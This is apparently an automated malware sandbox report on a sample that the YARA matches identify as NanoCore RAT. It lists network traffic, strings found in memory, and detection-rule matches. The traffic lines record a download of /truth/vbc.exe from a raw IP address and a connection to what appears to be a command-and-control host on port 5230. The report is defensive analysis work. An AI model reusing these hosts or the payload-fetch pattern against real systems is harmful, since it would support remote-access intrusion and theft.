Source: unknownHTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknownHTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: global trafficHTTP traffic detected: GET /truth/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 13.238.159.178Connection: Keep-Alive
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 194.5.98.103:5230
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknownTCP traffic detected without corresponding DNS query: 13.238.159.178
Source: vbc.exe, 00000006.00000002.522085206.0000000006EB0000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: vbc.exe, 00000006.00000002.519010155.00000000005A1000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685487329.000000000061D000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: sys30.exe, 00000008.00000002.524078956.0000000002ACA000.00000004.00000001.sdmpString found in binary or memory: http://dual-a-0001.dc-msedge.net
Source: vbc.exe, 00000006.00000002.522085206.0000000006EB0000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
Source: vbc.exe, 00000006.00000002.522085206.0000000006EB0000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
Source: vbc.exe, 00000006.00000002.522876095.0000000007097000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.700425177.000000000CE97000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.522876095.0000000007097000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.700425177.000000000CE97000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000003.516734811.000000000517B000.00000004.00000001.sdmp, sys30.exe, 00000007.00000003.529722871.0000000005415000.00000004.00000001.sdmpString found in binary or memory: http://n.f
Source: vbc.exe, 00000006.00000003.516734811.000000000517B000.00000004.00000001.sdmp, vbc.exe, 00000006.00000002.520252057.000000000518C000.00000004.00000001.sdmp, sys30.exe, 00000007.00000003.529722871.0000000005415000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/s
Source: vbc.exe, 00000006.00000003.516734811.000000000517B000.00000004.00000001.sdmp, sys30.exe, 00000007.00000003.529722871.0000000005415000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobede
Source: vbc.exe, 00000006.00000003.516734811.000000000517B000.00000004.00000001.sdmp, sys30.exe, 00000007.00000003.529722871.0000000005415000.00000004.00000001.sdmpString found in binary or memory: http://ns.ao
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: vbc.exe, 00000006.00000002.520345431.0000000005A70000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.696728913.0000000005AB0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000006.00000002.519221520.0000000002231000.00000004.00000001.sdmp, sys30.exe, 00000007.00000002.689029376.00000000026D1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000006.00000002.522876095.0000000007097000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.700425177.000000000CE97000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: sys30.exeString found in binary or memory: http://tempuri.org/PendingProList.xsd
Source: sys30.exeString found in binary or memory: http://tempuri.org/ProductDataSet.xsd
Source: sys30.exeString found in binary or memory: http://tempuri.org/ProductDataSet1.xsd
Source: vbc.exe, 00000006.00000002.519166195.0000000000D82000.00000020.00020000.sdmp, sys30.exe, 00000007.00000000.503536926.0000000001222000.00000020.00020000.sdmp, sys30.exe, 00000008.00000000.515458135.0000000001222000.00000020.00020000.sdmpString found in binary or memory: http://tempuri.org/ProductDataSet1.xsd#CustomerDataTableuThe
Source: sys30.exeString found in binary or memory: http://tempuri.org/login2DataSet.xsd
Source: vbc.exe, 00000006.00000002.522876095.0000000007097000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.700425177.000000000CE97000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000006.00000002.520345431.0000000005A70000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.696728913.0000000005AB0000.00000002.00020000.sdmp, sys30.exe, 00000008.00000002.524598460.0000000005BB0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: sys30.exe, 00000008.00000002.523915323.0000000002A92000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com
Source: vbc.exe, 00000006.00000002.522085206.0000000006EB0000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe, 00000006.00000002.522876095.0000000007097000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.700425177.000000000CE97000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe, 00000006.00000002.522085206.0000000006EB0000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: vbc.exe, 00000006.00000002.519018770.00000000005B2000.00000004.00000020.sdmp, sys30.exe, 00000007.00000002.685547185.0000000000635000.00000004.00000020.sdmp, sys30.exe, 00000008.00000002.522217919.00000000004A8000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: vbc.exe, 00000006.00000002.519221520.0000000002231000.00000004.00000001.sdmp, sys30.exe, 00000007.00000002.689029376.00000000026D1000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
Source: sys30.exeString found in binary or memory: https://www.google.com/
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\13E09461.emfJump to behavior
Source: unknownDNS traffic detected: queries for: www.google.com
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /truth/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 13.238.159.178Connection: Keep-Alive

E-Banking Fraud:

barindex
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.sys30.exe.564629.4.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.sys30.exe.560000.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.sys30.exe.37385c8.23.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 9.2.sys30.exe.37385c8.23.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.689054491.00000000026D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.693489208.000000000389A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.692921924.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.694133779.0000000003A5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 9.2.sys30.exe.38bc03e.28.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.640000.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.274d950.20.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.6a0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.377d06d.25.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.bb0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.d80000.15.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.397b2b6.32.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.564629.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.3770e39.27.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.bb0000.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.9f0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.38bc03e.28.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.38bc03e.28.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.ba0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.26ee188.22.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.560000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.740000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.396ce86.33.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.2759b98.21.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.2759b98.21.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.dd4c9f.18.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.3964057.31.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.3964057.31.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.2759b98.21.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.397b2b6.32.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.bd0000.13.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.640000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.37385c8.23.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.d80000.15.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.379169a.26.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.379169a.26.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.3770e39.27.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.3770e39.27.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.sys30.exe.3964057.31.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.630000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.37385c8.23.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.bc0000.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.sys30.exe.740000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.684831018.0000000000540000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.685396413.0000000000630000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.693081728.0000000003770000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.688333112.0000000000BD0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.689054491.00000000026D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.685574966.00000000006A0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.693489208.000000000389A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.687464909.00000000009F0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.686105411.0000000000740000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.688606934.0000000000DD0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.688048280.0000000000BB0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.688559291.0000000000D80000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.688236360.0000000000BC0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.687950106.0000000000BA0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.694133779.0000000003A5E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.688461757.0000000000C20000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.685496610.0000000000640000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
